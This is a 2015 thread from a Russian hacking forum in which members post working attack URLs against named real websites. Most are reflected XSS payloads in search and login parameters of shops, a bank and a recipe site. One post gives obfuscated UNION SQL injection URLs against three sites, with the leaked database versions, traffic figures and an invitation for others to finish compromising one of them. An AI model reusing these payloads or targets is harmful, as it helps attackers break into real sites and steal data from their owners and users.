HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.09.2015, 07:27
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065

Репутация: 0
По умолчанию

Ссылкаnlinetrade.ru

Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .


Код:
www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2fscript%253E&c=399581">alert("WH")>
 
Ответить с цитированием

  #2  
Старый 15.09.2015, 07:42
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065

Репутация: 0
По умолчанию

Ссылка: patee.ru

Тип:XSS-Reflected

Код:
">alert("WH")
Регистрируемся,создаем рецепт

Вбиваем в "Названии блюда" "Описание блюда" скрипт и ещё в "Стадия приготовления"

Там где число пропорции пишем любое число(только не сильно большое)

"Время приготовления в минутах " так же .

Не забудьте добавить ингредиенты(!),любые на рандом(я выбирал 4 штуки) .

После отправляем и видим XSS-Reflected .
 
Ответить с цитированием

  #3  
Старый 15.09.2015, 11:01
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от SaNDER  

Ссылкаnlinetrade.ru

Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .

Код:
www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2fscript%253E&c=399581">alert("WH")>

разберитесь с определениями.
 
Ответить с цитированием

  #4  
Старый 16.09.2015, 20:22
tipa_cracker
Новичок
Регистрация: 15.09.2015
Сообщений: 7
Провел на форуме:
1993

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #5  
Старый 19.09.2015, 01:51
DDShadoww
Новичок
Регистрация: 14.07.2015
Сообщений: 11
Провел на форуме:
2236

Репутация: 2
По умолчанию

Target: alfa.com.tw

Type: XSS Reflected

Код:
http://www.alfa.com.tw/search.php?keyword=">alert(1)
А для Safari, Chrome работает iframe если будет присутствовать закрывающий тэг.
 
Ответить с цитированием

  #6  
Старый 19.09.2015, 13:03
Filipp
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
Провел на форуме:
98300

Репутация: 31
По умолчанию

XSS-reflected:

Код:
www.topglobus.ru/sachy/ridici/sachy-hra2.php?id=4181471&pozz=4'%22()%26%25prompt(935766)
 
Ответить с цитированием

  #7  
Старый 20.09.2015, 18:39
joelblack
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
Провел на форуме:
70303

Репутация: 145
По умолчанию

target: http://www.unifinbank.ru/

type: XSS Reflected


Строка поиска:

Код:
">alert('hello')
 
Ответить с цитированием

  #8  
Старый 22.09.2015, 20:07
R3hab
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
Провел на форуме:
31545

Репутация: 6
По умолчанию

STREIT Group - Armored Cars Manufacturer

Код HTML:
http://www.armored-cars.com/vehicle/view_add.php?vid=-7%20/*!50000union*/%20distinct%20select%201,2,3,4,5,version(),7,8,9
ТИЦ 30

PR 3

AR 969,040


5.5.42-MariaDB-cll-lve


Make Free Bitcoin

Код HTML:
http://www.makefreebitco.in/news.php?id=-5'%20/*!50000union*/%20distinct%20select%201,version(),3,4--+f


AR 149,492

5.5.42-37.1


Трафф 140K


SMS PARIAZ - Accueil

Joomla кому надо,добьет

Код HTML:
http://www.smspariaz.com/race/turf2.php?mid=-7%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12--+f


PR 2

AR 322,679

5.6.23

Трафф 120K

 
Ответить с цитированием

  #9  
Старый 22.09.2015, 21:42
DDShadoww
Новичок
Регистрация: 14.07.2015
Сообщений: 11
Провел на форуме:
2236

Репутация: 2
По умолчанию

Target:220-volt.ru

Type:XSS Reflected

Код:
www.220-volt.ru/search/?q=confirm(1)
 
Ответить с цитированием

  #10  
Старый 25.09.2015, 07:34
tipa_cracker
Новичок
Регистрация: 15.09.2015
Сообщений: 7
Провел на форуме:
1993

Репутация: 0
По умолчанию

Мне кажется что тут ( http://www.girlplays.ru/ ) уязвимости в поисковике 0 ...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.